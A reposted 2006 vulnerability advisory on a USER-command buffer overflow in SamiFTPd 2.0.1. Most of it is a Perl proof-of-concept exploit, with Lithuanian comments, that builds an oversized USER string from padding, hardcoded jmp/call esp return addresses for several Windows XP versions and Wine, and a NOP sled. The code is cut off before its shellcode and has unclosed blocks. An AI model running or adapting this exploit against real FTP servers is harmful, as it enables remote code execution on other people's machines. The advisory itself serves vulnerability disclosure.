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SamiFTPd USER buffer overflow
来源:www.critical.lt 作者:critical 发布时间:2006-02-08  

SamiFTPd USER buffer overflow

"Sami FTP Server gives you an easy way to share files with your friends or your family: only a few clicks are needed to set up a small but powerful FTP server!"

SamiFTPd does not validate user input allowing attackers to execute arbitrary code when using the USER command.

The information has been provided by critical.lt.
The original article can be found at: http://www.critical.lt/?vulnerabilities/208
The original exploit can be found at: http://www.critical.lt/research/sami_ftp_poc.txt

Vulnerable Systems:
* SamiFTPd version 2.0.1

# Sami FTP Server v2.0.1 Remote notepad.exe execution PoC by Critical Security research http://www.critical.lt
# Tested on Windows XP SP2, Windows XP SP0 and even on FreeBSD 6.0-RELEASE Wine 0.9.6 :))

use Net::FTP; # <- jo, a tinginys :)
use Switch;

if (@ARGV < 3) {
print "--------------------------------------------------------------------\n";
print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\n";
print " Offsets: \n";
print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\n";
print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\n";
print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\n";
print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6 kernel32.dll jmp esp\n";
print " If values not specified, default values will be used.\n";
print " Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1\n";
print "--------------------------------------------------------------------\n";
$host = ""; # aukos ip
$yourip = "" ; # Reikalingas tam, kad b t galima sulyginti elkod , nes i steka sira o ir jusu ip adresas, todel ra ykit savo i orini (jei neturit tokio - gateway ip)
$offset = "\xE0\x3A\xB4\x76"; # defaultinis offsetas winmm.dll esant call esp (WinXP SP 2)

foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$yourip = $1 if ($_=~/-y((.*)\.(.*)\.(.*)\.(.*))/);
$offset = $1 if ($_=~/-o(.*)/);
#offset suradimui naudokit findjmp.exe arba metasploit.com opcod db ;) (call esp/jmp esp..)
switch ($offset) {
case 1 { $offset = "\xE0\x3A\xB4\x76" } # Windows XP SP2 winmm.dll call esp
case 2 { $offset = "\x7B\xD1\xB5\x76" } # Windows XP SP1 winmm.dll call esp
case 3 { $offset = "\xFB\x7B\xAB\x71" } # Windows XP SP0 ws2_32.dll jmp esp
case 4 { $offset = "\xDF\x95\x22\x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6 kernel32.dll jmp esp

foreach $letter (split '', $yourip) { $c++;};
$ftp = Net::FTP->new($host, Debug => 0) or die "Cannot connect: $@";
$user = "A" x 213 . # va iuojam iki returno :O (cia irgi galima ki t elkod :) )
"A" x (15 - $c) . # dar keli baitai sulyginimui, nes stek taip pat sira o ir ip adresas, tod l reikia pagal j paskai iuot, kur ra yt ret adres
$offset . # ret adresas kokio dll'o call esp ar jmp esp, ar ka nors pana aus svarbu, kad nu oktume esp ;)
"\x90" x 25 . # nop' sled'as, kad sulygintume su esp esan iu adresu

# elkodas paleid iantis notepad ( elkodas skirtas tiem kas sak , jog critical m gsta DoS :*) - nor sit, sid sit normal ..


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